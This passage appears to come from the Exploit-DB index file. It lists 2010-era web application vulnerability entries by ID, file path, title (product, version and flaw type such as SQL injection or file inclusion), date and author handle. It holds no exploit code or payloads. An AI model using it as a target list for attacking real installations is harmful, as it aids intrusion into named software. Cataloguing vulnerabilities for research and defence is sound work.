SQL Injection",2010-06-13,"L0rd CrusAd3r",webapps,asp, +13860,exploits/asp/webapps/13860.txt,"Digital Interchange Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",webapps,asp, +13861,exploits/asp/webapps/13861.txt,"Real-time ASP Calendar - SQL Injection",2010-06-13,"L0rd CrusAd3r",webapps,asp, +13862,exploits/php/webapps/13862.txt,"Pre Classified Listing - SQL Injection",2010-06-13,"L0rd CrusAd3r",webapps,php, +13863,exploits/php/webapps/13863.txt,"Lyrics Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,webapps,php, +13864,exploits/php/webapps/13864.txt,"Membership Site Script - SQL Injection",2010-06-14,Valentin,webapps,php, +13865,exploits/php/webapps/13865.txt,"Daily Inspirational Quotes Script - SQL Injection",2010-06-14,Valentin,webapps,php, +13866,exploits/php/webapps/13866.txt,"Joke Website Script - SQL Injection / Cross-Site Scripting",2010-06-14,Valentin,webapps,php, +13867,exploits/php/webapps/13867.txt,"E-Book Store - SQL Injection",2010-06-14,Valentin,webapps,php, +13880,exploits/asp/webapps/13880.txt,"Smart ASP Survey - Cross-Site Scripting / SQL Injection",2010-06-15,"L0rd CrusAd3r",webapps,asp, +13881,exploits/php/webapps/13881.txt,"Pre Job Board Pro - Authentication Bypass",2010-06-15,"L0rd CrusAd3r",webapps,php, +13882,exploits/asp/webapps/13882.txt,"SAS Hotel Management System - 'notfound' SQL Injection",2010-06-15,"L0rd CrusAd3r",webapps,asp, +13883,exploits/asp/webapps/13883.txt,"Business Classified Listing - SQL Injection",2010-06-15,"L0rd CrusAd3r",webapps,asp, +13884,exploits/asp/webapps/13884.txt,"Restaurant Listing with Online Ordering - SQL Injection",2010-06-15,"L0rd CrusAd3r",webapps,asp, +13885,exploits/asp/webapps/13885.txt,"Acuity CMS 2.7.1 - SQL Injection",2010-06-15,"L0rd CrusAd3r",webapps,asp, +13886,exploits/asp/webapps/13886.txt,"IISWorks FileMan - fileman.mdb Remote User Database Disclosure",2010-06-15,j0fer,webapps,asp, +13889,exploits/php/webapps/13889.txt,"Nakid CMS 0.5.2 - Remote File Inclusion",2010-06-16,sh00t0ut,webapps,php, +13890,exploits/php/webapps/13890.txt,"EZPX Photoblog 1.2 Beta - Remote File Inclusion",2010-06-16,sh00t0ut,webapps,php, +13891,exploits/asp/webapps/13891.html,"AspTR EXtended - Cross-Site Request Forgery",2010-06-16,FreWaL,webapps,asp, +13892,exploits/php/webapps/13892.txt,"PHPAuctionSystem - Arbitrary File Upload",2010-06-16,Sid3^effects,webapps,php, +13893,exploits/php/webapps/13893.txt,"Nakid CMS 0.5.2 - 'FCKeditor' Arbitrary File Upload",2010-06-16,eidelweiss,webapps,php, +13894,exploits/php/webapps/13894.txt,"2DayBiz Online Classified System - SQL Injection / Cross-Site Scripting",2010-06-16,Sid3^effects,webapps,php, +13897,exploits/php/webapps/13897.txt,"Real Estate - SQL Injection",2010-06-16,"L0rd CrusAd3r",webapps,php, +13898,exploits/php/webapps/13898.pl,"DMSEasy 0.9.7 - 'FCKeditor' Arbitrary File Upload",2010-06-17,sh00t0ut,webapps,php, +13899,exploits/php/webapps/13899.txt,"Pithcms 0.9.5 - Local File Inclusion",2010-06-17,sh00t0ut,webapps,php, +13900,exploits/php/webapps/13900.txt,"Easy Travel Portal - SQL Injection",2010-06-17,"L0rd CrusAd3r",webapps,php, +13901,exploits/php/webapps/13901.txt,"PenPals - Authentication Bypass",2010-06-17,"L0rd CrusAd3r",webapps,php, +13902,exploits/asp/webapps/13902.txt,"Ananda Image Gallery - SQL Injection",2010-06-17,"L0rd CrusAd3r",webapps,asp, +13904,exploits/php/webapps/13904.txt,"Planet 1.1 - Cross-Site Request Forgery (Add Admin)",2010-06-17,G0D-F4Th3r,webapps,php, +13911,exploits/php/webapps/13911.txt,"Live CMS - SQL Injection",2010-06-17,ahwak2000,webapps,php, +13912,exploits/php/webapps/13912.txt,"Havij 1.10 - Persistent Cross-Site Scripting",2010-06-17,hexon,webapps,php, +13916,exploits/php/webapps/13916.txt,"PHP-Nuke Module print 6.0 - 'print&sid' SQL Injection",2010-06-17,Gamoscu,webapps,php, +13918,exploits/multiple/webapps/13918.txt,"Spring Framework - Arbitrary code Execution",2010-06-18,"Meder Kydyraliev",webapps,multiple, +13922,exploits/php/webapps/13922.txt,"Joomla! Component com_joomdocs - Cross-Site Scripting",2010-06-18,Sid3^effects,webapps,php, +13923,exploits/php/webapps/13923.txt,"Joomla! Component Answers 2.3beta - Multiple Vulnerabilities",2010-06-18,jdc,webapps,php, +13925,exploits/php/webapps/13925.txt,"Joomla! Component Ozio Gallery 2 - Multiple Vulnerabilities",2010-06-18,jdc,webapps,php, +13926,exploits/php/webapps/13926.txt,"Joomla! Component com_listbingo 1.3 - Multiple Vulnerabilities",2010-06-18,jdc,webapps,php, +13927,exploits/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,webapps,php, +13929,exploits/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",webapps,php, +13930,exploits/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",webapps,php, +13931,exploits/php/webapps/13931.txt,"KubeLance 1.7.6 - 'profile.php' SQL Injection",2010-06-18,"L0rd CrusAd3r",webapps,php, +13933,exploits/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,webapps,php, +13935,exploits/php/webapps/13935.txt,"Joomla! Component RSComments 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,webapps,php, +13936,exploits/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - 'ladder[id]' SQL Injection",2010-06-19,ahwak2000,webapps,php, +13937,exploits/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection",2010-06-19,ahwak2000,webapps,php, +13938,exploits/php/webapps/13938.html,"WebsiteBaker 2.8.1 - Cross-Site Request Forgery (PoC)",2010-06-19,"Luis Santana",webapps,php, +14848,exploits/php/webapps/14848.txt,"Web-Ideas Web Shop Standard - SQL Injection",2010-08-31,Ariko-Security,webapps,php, +13944,exploits/php/webapps/13944.txt,"SimpleAssets - Authentication Bypass / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",webapps,php, +13945,exploits/php/webapps/13945.txt,"iBoutique - 'page' SQL Injection / Cross-Site Scripting",2010-06-20,"L0rd CrusAd3r",webapps,php, +13946,exploits/php/webapps/13946.txt,"Overstock Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",webapps,php, +13947,exploits/php/webapps/13947.txt,"PHP Calendars Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",webapps,php, +13948,exploits/php/webapps/13948.txt,"OroHYIP - SQL Injection",2010-06-20,"L0rd CrusAd3r",webapps,php, +13949,exploits/php/webapps/13949.txt,"Shareasale Script - SQL Injection",2010-06-20,"L0rd CrusAd3r",webapps,php, +13951,exploits/php/webapps/13951.txt,"Joomla! Component com_eportfolio - Arbitrary File Upload",2010-06-20,Sid3^effects,webapps,php, +13952,exploits/php/webapps/13952.txt,"Saffa Tunes CMS - 'news.php' SQL Injection",2010-06-21,"Th3 RDX",webapps,php, +13954,exploits/php/webapps/13954.txt,"G.CMS Generator - SQL Injection",2010-06-21,Sid3^effects,webapps,php, +13955,exploits/php/webapps/13955.txt,"Joomla! Component com_community - Persistent Cross-Site Scripting",2010-06-21,Sid3^effects,webapps,php, +13956,exploits/php/webapps/13956.txt,"Joomla! Component com_jomestate - Remote File Inclusion",2010-06-21,Sid3^effects,webapps,php, +13957,exploits/php/webapps/13957.txt,"myUPB 2.2.6 - Multiple Vulnerabilities",2010-06-21,ALTBTA,webapps,php, +14363,exploits/php/webapps/14363.txt,"Ad Network Script - Persistent Cross-Site Scripting",2010-07-14,Sid3^effects,webapps,php, +14359,exploits/php/webapps/14359.html,"ZenPhoto CMS 1.3 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-14,10n1z3d,webapps,php, +13960,exploits/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 - Cross-Site Request Forgery",2010-06-21,"Jeremiah Talamantes",webapps,php, +13961,exploits/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection",2010-06-21,"Th3 RDX",webapps,php, +13962,exploits/php/webapps/13962.txt,"Joomla! Component JomSocial 1.6.288 - Multiple Cross-Site Scripting Vulnerabilities",2010-06-21,jdc,webapps,php, +13964,exploits/php/webapps/13964.txt,"Linker IMG 1.0 - Remote File Inclusion",2010-06-21,"Sn!pEr.S!Te Hacker",webapps,php, +13966,exploits/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure",2010-06-22,Xa7m3d,webapps,php, +13967,exploits/php/webapps/13967.txt,"Online Classified System Script - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",webapps,php, +13969,exploits/php/webapps/13969.txt,"Job Search Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",webapps,php, +13970,exploits/php/webapps/13970.txt,"Video Community portal - SQL Injection / Cross-Site Scripting",2010-06-22,"L0rd CrusAd3r",webapps,php, +13971,exploits/php/webapps/13971.txt,"Classifieds Script - 'rate' SQL Injection",2010-06-22,"L0rd CrusAd3r",webapps,php, +13973,exploits/php/webapps/13973.txt,"Hot or Not Picture Rating Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",webapps,php, +13975,exploits/php/webapps/13975.txt,"Webring Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",webapps,php, +13976,exploits/php/webapps/13976.txt,"Top Sites Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",webapps,php, +13977,exploits/php/webapps/13977.txt,"Social Community Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",webapps,php, +13978,exploits/php/webapps/13978.txt,"Job Search Engine Script - SQL Injection",2010-06-22,"L0rd CrusAd3r",webapps,php, +13979,exploits/php/webapps/13979.txt,"Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection",2010-06-22,v3n0m,webapps,php, +13980,exploits/php/webapps/13980.txt,"Cornerstone CMS - SQL Injection",2010-06-22,"Th3 RDX",webapps,php, +13981,exploits/php/webapps/13981.txt,"Joomla! Component Picasa2Gallery 1.2.8 - Local File Inclusion",2010-06-22,kaMtiEz,webapps,php, +13982,exploits/php/webapps/13982.txt,"Alpin CMS - 'e4700.asp?id' SQL Injection",2010-06-22,CoBRa_21,webapps,php, +13983,exploits/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection",2010-06-22,Net.Edit0r,webapps,php, +13986,exploits/php/webapps/13986.txt,"Softbiz Resource Repository Script - Blind SQL Injection",2010-06-22,Sangteamtham,webapps,php, +13987,exploits/php/webapps/13987.txt,"PreProject Multi-Vendor Shopping Malls - SQL Injection",2010-06-22,Sangteamtham,webapps,php, +13988,exploits/php/webapps/13988.txt,"PHP Event Calendar 1.5 - Multiple Vulnerabilities",2010-06-22,cp77fk4r,webapps,php, +13990,exploits/asp/webapps/13990.txt,"Boat Classifieds - SQL Injection",2010-06-22,Sangteamtham,webapps,asp, +13991,exploits/php/webapps/13991.txt,"Softbiz PHP FAQ Script - Blind SQL Injection",2010-06-22,Sangteamtham,webapps,php, +13992,exploits/php/webapps/13992.txt,"Pre PHP Classifieds - SQL Injection",2010-06-22,Sangteamtham,webapps,php, +13993,exploits/php/webapps/13993.txt,"K-Search - SQL Injection / Cross-Site Scripting",2010-06-22,Sangteamtham,webapps,php, +14512,exploits/php/webapps/14512.txt,"Concept E-Commerce - SQL Injection",2010-07-31,gendenk,webapps,php, +13995,exploits/asp/webapps/13995.txt,"Boat Classifieds - 'printdetail.asp?Id' SQL Injection",2010-06-23,CoBRa_21,webapps,asp, +13996,exploits/php/webapps/13996.txt,"PreProject Multi-Vendor Shopping Malls - 'products.php?sid' SQL Injection",2010-06-23,CoBRa_21,webapps,php, +13997,exploits/php/webapps/13997.txt,"Joomla! Component JE Ajax Event Calendar 1.0.5 - SQL Injection",2010-06-23,"L0rd CrusAd3r",webapps,php, +13999,exploits/php/webapps/13999.html,"Software Index - Arbitrary File Upload",2010-06-23,indoushka,webapps,php, +14000,exploits/php/webapps/14000.txt,"PishBini Footbal - Cross-Site Scripting / SQL Injection",2010-06-23,indoushka,webapps,php, +14001,exploits/multiple/webapps/14001.txt,"Interscan Web Security Virtual Appliance 5.0 - Arbitrary File Download",2010-06-23,"Ivan Huertas",webapps,multiple, +14004,exploits/multiple/webapps/14004.txt,"Interscan Web Security 5.0 - Arbitrary File Upload / Privilege Escalation",2010-06-23,"Ivan Huertas",webapps,multiple, +14005,exploits/php/webapps/14005.txt,"2DayBiz MLM Script - SQL Injection",2010-06-23,JaMbA,webapps,php, +14007,exploits/php/webapps/14007.txt,"Custom Business Card script - SQL Injection",2010-06-23,JaMbA,webapps,php, +14008,exploits/php/webapps/14008.txt,"2DayBiz Matrimonial Script - SQL Injection",2010-06-23,JaMbA,webapps,php, +14009,exploits/php/webapps/14009.txt,"2DayBiz Freelance Script - SQL Injection",2010-06-23,JaMbA,webapps,php, +14011,exploits/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",webapps,php, +14015,exploits/php/webapps/14015.txt,"2DayBiz Photo Sharing Script - SQL Injection (1)",2010-06-24,JaMbA,webapps,php, +14016,exploits/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta - 'init.php' Remote File Inclusion",2010-06-24,v3n0m,webapps,php, +14017,exploits/php/webapps/14017.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion (2)",2010-06-24,MISTERFRIBO,webapps,php, +14018,exploits/php/webapps/14018.txt,"2DayBiz Video Community Portal - 'user-profile.php' SQL Injection",2010-06-24,Sangteamtham,webapps,php, +14019,exploits/php/webapps/14019.txt,"2DayBiz Real Estate Portal - 'viewpropertydetails.php' SQL Injection",2010-06-24,Sangteamtham,webapps,php, +14020,exploits/php/webapps/14020.txt,"2DayBiz The Web Template Software - SQL Injection / Cross-Site Scripting",2010-06-24,Sangteamtham,webapps,php, +14026,exploits/php/webapps/14026.txt,"AbleDating script - SQL Injection",2010-06-24,JaMbA,webapps,php, +14027,exploits/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",webapps,php, +14028,exploits/php/webapps/14028.txt,"2DayBiz B2B Portal Script - SQL Injection",2010-06-24,JaMbA,webapps,php, +14030,exploits/asp/webapps/14030.pl,"PHPortal 1.2 - 'gunaysoft.php' Remote File Inclusion",2010-06-24,Ma3sTr0-Dz,webapps,asp, +14033,exploits/php/webapps/14033.txt,"Big Forum 5.2 - Arbitrary File Upload / Local File Inclusion",2010-06-24,"Zer0 Thunder",webapps,php, +14035,exploits/php/webapps/14035.txt,"Big Forum - 'forum.php?id' SQL Injection",2010-06-24,JaMbA,webapps,php, +14047,exploits/php/webapps/14047.txt,"2DayBiz Matrimonial Script - SQL Injection / Cross-Site Scripting",2010-06-25,Sangteamtham,webapps,php, +14048,exploits/php/webapps/14048.txt,"2DayBiz - Multiple SQL Injections",2010-06-25,Sangteamtham,webapps,php, +14049,exploits/php/webapps/14049.html,"Allomani Songs & Clips 2.7.0 - Cross-Site Request Forgery (Add Admin)",2010-06-25,G0D-F4Th3rG0D-F4Th3r,webapps,php, +14050,exploits/php/webapps/14050.txt,"ARSC Really Simple Chat 3.3 - Remote File Inclusion / Cross-Site Scripting",2010-06-25,"Zer0 Thunder",webapps,php, +14051,exploits/php/webapps/14051.txt,"2DayBiz B2B Portal Script - 'selling_buy_leads1.php' SQL Injection",2010-06-25,r45c4l,webapps,php, +14053,exploits/php/webapps/14053.txt,"snipe Gallery Script - SQL Injection",2010-06-25,"dev!l ghost",webapps,php, +14054,exploits/php/webapps/14054.txt,"Joomla! Component jesubmit 1.4 - SQL Injection",2010-06-25,"L0rd CrusAd3r",webapps,php, +14055,exploits/php/webapps/14055.txt,"Joomla! Component com_sef - Remote File Inclusion",2010-06-26,Li0n-PaL,webapps,php, +14056,exploits/php/webapps/14056.txt,"Clicker CMS - Blind SQL Injection",2010-06-26,hacker@sr.gov.yu,webapps,php, +14057,exploits/php/webapps/14057.txt,"WordPress Plugin Cimy Counter - Full Path Disclosure / Redirector / Cross-Site Scripting / HTTP Response Spitting",2010-06-26,sebug,webapps,php, +14058,exploits/aix/webapps/14058.html,"PHP-Nuke 8.2 - Arbitrary File Upload",2010-06-26,Net.Edit0r,webapps,aix, +14059,exploits/php/webapps/14059.txt,"Joomla! Component JE Awd Song - Persistent Cross-Site Scripting",2010-06-26,Sid3^effects,webapps,php, +14060,exploits/php/webapps/14060.txt,"Joomla! Component JE Media Player - Local File Inclusion",2010-06-26,Sid3^effects,webapps,php, +14085,exploits/php/webapps/14085.txt,"iNet Online Community - Blind SQL Injection",2010-06-28,JaMbA,webapps,php, +14086,exploits/php/webapps/14086.txt,"PTCPay GEN4 - 'buyupg.php' SQL Injection",2010-06-28,Dark.Man,webapps,php, +14062,exploits/php/webapps/14062.txt,"Joomla! Component jeeventcalendar - Local File Inclusion",2010-06-26,Sid3^effects,webapps,php, +14063,exploits/php/webapps/14063.txt,"Joomla! Component com_jejob - Local File Inclusion",2010-06-26,Sid3^effects,webapps,php, +14064,exploits/php/webapps/14064.txt,"Joomla! Component jesectionfinder - Local File Inclusion",2010-06-26,Sid3^effects,webapps,php, +14073,exploits/php/webapps/14073.txt,"2DayBiz Matrimonial Script - 'smartresult.php' SQL Injection",2010-06-27,"Easy Laster",webapps,php, +14070,exploits/php/webapps/14070.txt,"Speedy 1.0 - Arbitrary File Upload",2010-06-26,"ViRuS Qalaa",webapps,php, +14074,exploits/php/webapps/14074.rb,"2DayBiz ybiz Polls Script - SQL Injection",2010-06-27,"Easy Laster",webapps,php, +14075,exploits/php/webapps/14075.rb,"2DayBiz ybiz Freelance Script - SQL Injection",2010-06-27,"Easy Laster",webapps,php, +14076,exploits/php/webapps/14076.rb,"2DayBiz Photo Sharing Script - SQL Injection (2)",2010-06-27,"Easy Laster",webapps,php, +14078,exploits/php/webapps/14078.txt,"Bilder Upload Script Datei Upload 1.09 - Arbitrary File Upload",2010-06-27,Mr.Benladen,webapps,php, +14079,exploits/php/webapps/14079.txt,"i-netsolution Job Search Engine - SQL Injection",2010-06-27,Sid3^effects,webapps,php, +14080,exploits/php/webapps/14080.txt,"I-Net MLM Script Engine - SQL Injection",2010-06-27,Sid3^effects,webapps,php, +14084,exploits/php/webapps/14084.txt,"Swoopo Clone 2010 - SQL Injection",2010-06-27,"L0rd CrusAd3r",webapps,php, +14089,exploits/php/webapps/14089.txt,"PageDirector CMS - Multiple Vulnerabilities",2010-06-28,Tr0y-x,webapps,php, +14094,exploits/php/webapps/14094.txt,"Netartmedia iBoutique.MALL - SQL Injection",2010-06-28,Sid3^effects,webapps,php, +14095,exploits/php/webapps/14095.txt,"I-net Multi User Email Script - SQL Injection",2010-06-28,Sid3^effects,webapps,php, +14096,exploits/php/webapps/14096.html,"CMSQLite / CMySQLite 1.3 - Cross-Site Request Forgery",2010-06-28,"ADEO Security",webapps,php, +14106,exploits/php/webapps/14106.txt,"PHPDirector 0.30 - 'videos.php' SQL Injection",2010-06-29,Mr-AbdoX,webapps,php, +14107,exploits/php/webapps/14107.txt,"YPNinc JokeScript - 'ypncat_id' SQL Injection",2010-06-29,v3n0m,webapps,php, +14104,exploits/multiple/webapps/14104.txt,"Ecomat CMS - SQL Injection",2010-06-29,"High-Tech Bridge SA",webapps,multiple, +14101,exploits/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload",2010-06-28,Battousai,webapps,multiple,80 +14103,exploits/multiple/webapps/14103.txt,"Applicure dotDefender 4.01-3 - Persistent Cross-Site Scripting",2010-06-28,EnableSecurity,webapps,multiple,80 +14109,exploits/php/webapps/14109.txt,"YPNinc PHP Realty Script - 'docID' SQL Injection",2010-06-29,v3n0m,webapps,php, +14110,exploits/php/webapps/14110.txt,"Allomani E-Store 1.0 - Cross-Site Request Forgery (Add Admin) (1)",2010-06-29,G0D-F4Th3r,webapps,php, +14111,exploits/php/webapps/14111.txt,"Allomani Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,webapps,php, +14112,exploits/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,webapps,php, +14115,exploits/windows/webapps/14115.txt,"Gekko CMS - SQL Injection",2010-06-29,[]0iZy5,webapps,windows,80 +14117,exploits/multiple/webapps/14117.txt,"CubeCart PHP 4.3.x - 'shipkey' SQL Injection",2010-06-29,"Core Security",webapps,multiple,80 +14118,exploits/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,webapps,multiple,80 +14274,exploits/php/webapps/14274.txt,"Joomla! Component Music Manager - Local File Inclusion",2010-07-08,Sid3^effects,webapps,php, +14123,exploits/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX & Cr3W-DZ",webapps,php, +14124,exploits/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,webapps,php, +14125,exploits/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,webapps,php, +14126,exploits/php/webapps/14126.txt,"Joomla! Component Gamesbox 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,webapps,php, +14127,exploits/php/webapps/14127.txt,"Joomla! Component Joomanager - SQL Injection",2010-06-30,Sid3^effects,webapps,php, +14141,exploits/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,webapps,php, +14132,exploits/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",webapps,php, +14144,exploits/php/webapps/14144.txt,"Specialist Bed and Breakfast Website - SQL Injection",2010-06-30,JaMbA,webapps,php, +14145,exploits/php/webapps/14145.txt,"Golf Club Site - SQL Injection",2010-06-30,JaMbA,webapps,php, +14146,exploits/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution",2010-06-30,emgent,webapps,hardware,80 +14147,exploits/php/webapps/14147.txt,"NinkoBB - Cross-Site Request Forgery",2010-07-01,"ADEO Security",webapps,php, +14149,exploits/asp/webapps/14149.txt,"Setiran CMS - Blind SQL Injection",2010-07-01,"Th3 RDX",webapps,asp, +14151,exploits/php/webapps/14151.pl,"Oxygen2PHP 1.1.3 - 'post.php' Blind SQL Injection",2010-07-01,Dante90,webapps,php, +14152,exploits/php/webapps/14152.pl,"Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection",2010-07-01,Dante90,webapps,php, +14154,exploits/php/webapps/14154.txt,"Joomla! Component com_dateconverter 0.1 - SQL Injection",2010-07-01,RoAd_KiLlEr,webapps,php, +14155,exploits/asp/webapps/14155.txt,"SIDA University System - SQL Injection",2010-07-01,K053,webapps,asp, +14209,exploits/php/webapps/14209.txt,"Joomla! Component Front-End Article Manager System - Arbitrary File Upload",2010-07-04,Sid3^effects,webapps,php, +14165,exploits/php/webapps/14165.txt,"iScripts EasyBiller - Cross-Site Scripting",2010-07-02,Sangteamtham,webapps,php, +14163,exploits/php/webapps/14163.txt,"iScripts ReserveLogic 1.0 - SQL Injection",2010-07-01,"Salvatore Fresta",webapps,php, +14164,exploits/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection",2010-07-02,"Salvatore Fresta",webapps,php, +14160,exploits/php/webapps/14160.txt,"Interscan Web Security 5.0 - Persistent Cross-Site Scripting",2010-07-01,"Ivan Huertas",webapps,php, +14177,exploits/linux/webapps/14177.txt,"Xplico 0.5.7 - 'add.ctp' Cross-Site Scripting (1)",2010-07-02,"Marcos Garcia & Maximiliano Soler",webapps,linux, +14162,exploits/php/webapps/14162.txt,"iScripts EasySnaps 2.0 - Multiple SQL Injections",2010-07-01,"Salvatore Fresta",webapps,php, +14176,exploits/php/webapps/14176.c,"iScripts Socialware 2.2.x - Arbitrary File Upload",2010-07-02,"Salvatore Fresta",webapps,php, +14166,exploits/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion",2010-07-02,"John Leitch",webapps,php, +14171,exploits/php/webapps/14171.txt,"Iphone Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,webapps,php, +14172,exploits/php/webapps/14172.txt,"Joomla! Component com_seyret - Blind SQL Injection",2010-07-02,RoAd_KiLlEr,webapps,php, +14170,exploits/php/webapps/14170.txt,"Pointter Social Network - Local File Inclusion",2010-07-02,Sid3^effects,webapps,php, +14168,exploits/asp/webapps/14168.txt,"VGM Forbin - 'article.asp' SQL Injection",2010-07-02,"Th3 RDX",webapps,asp, +14169,exploits/asp/webapps/14169.txt,"MooreAdvice - 'productlist.asp' SQL Injection",2010-07-02,"Th3 RDX",webapps,asp, +14183,exploits/php/webapps/14183.txt,"Joomla! Component com_seyret - Local File Inclusion",2010-07-03,"Cooler_ unix",webapps,php, +14192,exploits/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",webapps,asp, +14184,exploits/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,webapps,php, +14186,exploits/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,webapps,php, +14187,exploits/php/webapps/14187.txt,"Joomla! Component eventCal 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,webapps,php, +14188,exploits/php/webapps/14188.html,"cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,webapps,php, +14193,exploits/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",webapps,php, +14208,exploits/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,webapps,php, +14196,exploits/php/webapps/14196.txt,"Joomla! Component Techjoomla SocialAds - Persistent Cross-Site Scripting",2010-07-03,Sid3^effects,webapps,php, +14197,exploits/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injections",2010-07-03,"Salvatore Fresta",webapps,php, +14198,exploits/php/webapps/14198.txt,"WordPress Plugin Simple:Press 4.3.0 - SQL Injection",2010-07-04,"ADEO Security",webapps,php, +14199,exploits/php/webapps/14199.txt,"PHPaaCMS 0.3.1 - 'show.php?id' SQL Injection",2010-07-04,Shafiq-Ur-Rehman,webapps,php, +14201,exploits/php/webapps/14201.txt,"PHPaaCMS - 'list.php?id' SQL Injection",2010-07-04,CoBRa_21,webapps,php, +14202,exploits/php/webapps/14202.txt,"iLister Listing Software - Local File Inclusion",2010-07-04,Sid3^effects,webapps,php, +14203,exploits/php/webapps/14203.txt,"TCW PHP Album - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",webapps,php, +14204,exploits/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",webapps,php, +14205,exploits/php/webapps/14205.txt,"Esoftpro Online Photo Pro 2 - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",webapps,php, +14206,exploits/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",webapps,php, +14207,exploits/php/webapps/14207.txt,"Joomla! Component Phoca Gallery 2.7.3 - SQL Injection",2010-07-04,RoAd_KiLlEr,webapps,php, +14210,exploits/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,webapps,php, +14211,exploits/php/webapps/14211.txt,"Joomla! Component NinjaMonials - Blind SQL Injection",2010-07-04,Sid3^effects,webapps,php, +14213,exploits/php/webapps/14213.txt,"Joomla! Component com_sef - Local File Inclusion",2010-07-05,_mlk_,webapps,php, +14214,exploits/php/webapps/14214.txt,"bbPress 1.0.2 - Cross-Site Request Forgery (Change Admin Password)",2010-07-05,saudi0hacker,webapps,php, +14217,exploits/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection",2010-07-05,"ADEO Security",webapps,php, +14250,exploits/php/webapps/14250.txt,"Joomla! Component NeoRecruit 1.6.4 - 'Itemid' Blind SQL Injection",2010-07-06,Sid3^effects,webapps,php, +14223,exploits/php/webapps/14223.txt,"Bs Scripts_Directory - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,webapps,php, +14224,exploits/php/webapps/14224.txt,"Bs Recipes_Website Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,webapps,php, +14225,exploits/php/webapps/14225.txt,"Bs Realtor_Web Script - SQL Injection",2010-07-05,Sid3^effects,webapps,php, +14226,exploits/php/webapps/14226.txt,"Bs Home_Classifieds Script - SQL Injection",2010-07-05,Sid3^effects,webapps,php, +14227,exploits/php/webapps/14227.txt,"Bs Events_Locator Script - SQL Injection",2010-07-05,Sid3^effects,webapps,php, +14228,exploits/php/webapps/14228.txt,"Bs General_Classifieds Script - SQL Injection",2010-07-05,Sid3^effects,webapps,php, +14229,exploits/php/webapps/14229.txt,"Bs Auto_Classifieds Script - 'articlesdetails.php' SQL Injection",2010-07-05,Sid3^effects,webapps,php, +14230,exploits/php/webapps/14230.txt,"Bs Business_Directory Script - SQL Injection / Authentication Bypass",2010-07-05,Sid3^effects,webapps,php, +33410,exploits/php/webapps/33410.txt,"Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection",2009-12-16,"Justin 